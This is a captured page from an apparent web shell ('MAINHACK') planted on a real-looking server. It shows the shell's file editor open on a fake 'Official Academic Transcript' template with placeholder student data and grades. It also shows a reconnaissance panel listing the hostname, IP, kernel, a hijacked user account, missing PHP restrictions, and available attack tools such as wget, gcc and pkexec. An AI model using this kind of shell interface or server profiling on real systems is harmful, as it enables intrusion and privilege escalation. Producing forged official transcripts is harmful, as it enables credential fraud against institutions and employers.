[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: transcript.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Academic Transcript</title> <style> body { font-family: 'Arial', sans-serif; background-color: #f0f2f5; margin: 0; padding: 0; } .transcript-container { max-width: 900px; margin: 40px auto; background-color: white; padding: 30px; border-radius: 8px; box-shadow: 0 0 15px rgba(0, 0, 0, 0.1); } h1 { text-align: center; text-transform: uppercase; color: #333; } .header-section { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; border-bottom: 2px solid #007bff; padding-bottom: 15px; } .header-section img { width: 80px; height: auto; } .student-info { margin-bottom: 20px; } .student-info p { margin: 8px 0; font-weight: bold; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { padding: 12px; border: 1px solid #ddd; text-align: center; } th { background-color: #007bff; color: white; } .gpa { text-align: right; font-weight: bold; margin-top: 10px; } .footer { text-align: center; margin-top: 30px; font-size: 14px; color: #777; } .footer p { margin: 5px 0; } .signature-section { display: flex; justify-content: space-between; margin-top: 40px; } .signature-box { width: 45%; text-align: center; border-top: 1px solid #000; padding-top: 10px; } </style> </head> <body> <div class="transcript-container"> <div class="header-section"> <div> <h2>XYZ University</h2> <p>Official Academic Transcript</p> </div> <img src="logo.png" alt="University Logo"> </div> <div class="student-info"> <p>Student Name: John Doe</p> <p>Student ID: 12345678</p> <p>Program: Bachelor of Science in Computer Science</p> <p>Academic Year: 2023/2024</p> </div> <table> <thead> <tr> <th>Course Code</th> <th>Course Title</th> <th>Credit Hours</th> <th>Grade</th> </tr> </thead> <tbody> <tr> <td>CS101</td> <td>Introduction to Computer Science</td> <td>3</td> <td>A</td> </tr> <tr> <td>MATH102</td> <td>Calculus I</td> <td>4</td> <td>B+</td> </tr> <tr> <td>PHYS103</td> <td>Physics for Engineers</td> <td>3</td> <td>B</td> </tr> <tr> <td>ENG104</td> <td>Technical Writing</td> <td>2</td> <td>A-</td> </tr> <tr> <td>CS105</td> <td>Data Structures</td> <td>3</td> <td>A</td> </tr> </tbody> </table> <div class="gpa"> <p>Total Credit Hours: 15</p> <p>GPA: 3.75</p> </div> <div class="signature-section"> <div class="signature-box"> <p>Registrar's Signature</p> </div> <div class="signature-box"> <p>Student's Signature</p> </div> </div> <div class="footer"> <p>XYZ University</p> <p>1234 University Road, City, Country</p> <p>Email: info@xyzuniversity.edu | Phone: +123-456-7890</p> </div> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.72 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002